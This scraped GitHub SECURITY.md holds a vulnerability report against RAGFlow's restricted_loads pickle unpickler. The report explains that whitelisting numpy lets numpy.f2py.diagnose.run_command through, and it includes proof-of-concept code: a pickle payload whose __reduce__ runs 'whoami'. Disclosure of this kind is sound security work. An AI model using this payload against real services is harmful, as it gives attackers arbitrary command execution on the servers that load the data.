Skip to content

Latest commit

History

History
74 lines (52 loc) · 1.89 KB

SECURITY.md

File metadata and controls

74 lines (52 loc) · 1.89 KB

Security Policy

Supported Versions

Use this section to tell people about which versions of your project are currently being supported with security updates.

Version Supported
<=0.7.0

Reporting a Vulnerability

Branch name

main

Actual behavior

The restricted_loads function atapi/utils/init.py#L215is still vulnerable leading via code execution. The main reason is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy.

Steps to reproduce

ragflow_patch.py

importbuiltins
importio
importpickle

safe_module={
'numpy',
'rag_flow'
}


classRestrictedUnpickler(pickle.Unpickler):
deffind_class(self,module,name):
importimportlib
ifmodule.split('.')[0]insafe_module:
_module=importlib.import_module(module)
returngetattr(_module,name)
# Forbid everything else.
raisepickle.UnpicklingError("global '%s.%s' is forbidden"%
(module,name))


defrestricted_loads(src):
"""Helper function analogous to pickle.loads()." ""
returnRestrictedUnpickler(io.BytesIO(src)).load()

Then,PoC.py

importpickle
fromragflow_patchimportrestricted_loads
classExploit:
def__reduce__(self):
importnumpy.f2py.diagnose
returnnumpy.f2py.diagnose.run_command,('whoami',)

Payload=pickle.dumps(Exploit())
restricted_loads(Payload)

Result image

Additional information

How to prevent?

Strictly filter the module and name before calling with getattr function.